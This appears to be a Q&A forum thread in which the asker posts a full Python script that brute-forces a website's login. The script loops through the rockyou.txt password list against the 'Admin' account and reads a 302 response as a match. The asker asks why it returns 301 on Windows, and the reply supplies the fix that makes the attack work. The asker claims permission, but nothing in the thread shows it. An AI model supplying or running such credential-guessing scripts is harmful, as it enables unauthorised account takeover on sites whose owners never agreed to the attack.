# Python Requests.Post - Windows returns 301 status code, Linux 200/302

Tags: python-3.x, web, python-requests

So I'm trying to bruteforce the Username/Password combo on a friend's website (which I am allowed to do) and I was doing it in a way that if the `status_code` that the `requests.post` function returned was **200 (Ok)** it would be an unsuccessful attempt and if it returned **302 (Found)** it would be successful. (This was the way the website reacted when I logged in correctly and incorrectly).

Now I was doing this on Linux before, where it was working, but I had to switch back to Windows and now it's always returning **301 (Moved Permanently)**. `allow_redirects` is set to `False` in both cases, so I have no idea what's going on.

Here's the full code:

```
import requests
url = 'BLAHBLAHBLAH.com/login.php'


username = 'Admin'
passwords = open('rockyou.txt', 'r', encoding='unicode_escape').read().split("\n")

for password in passwords:
    try:
        response = requests.post(url, allow_redirects=False, data={'username': username, 'password': password})
        login = "'" + username + "' : '" + password + "'"
        print("Trying " + login)

        print(response.status_code)

        if response.status_code == 302:
            print('Match found - ' + login)
            break
        elif response.status_code == 200:
            pass
        else:
            pass
    except Exception as e:
        print(str(e))
```

Comment: Are you sure the versions of the `requests` and Python are the same on both systems and there is no proxy?

Comment: Where's `response` defined?

Comment: @PiCTo Sorry about that, I was playing with the code before this, I put 'response' back in there

Comment: @sophros Well the linux version was fresh, I installed it yesterday, so I presume the requests there is the latest one and I updated python and requests on Windows but I get the same problem. And there's no proxy.

Answer (score 0):

This error commonly comes up when you try to access a HTTPS site via HTTP. Add the protocol to your URL and it should work.

`url = 'https://BLAHBLAHBLAH.com/login.php'`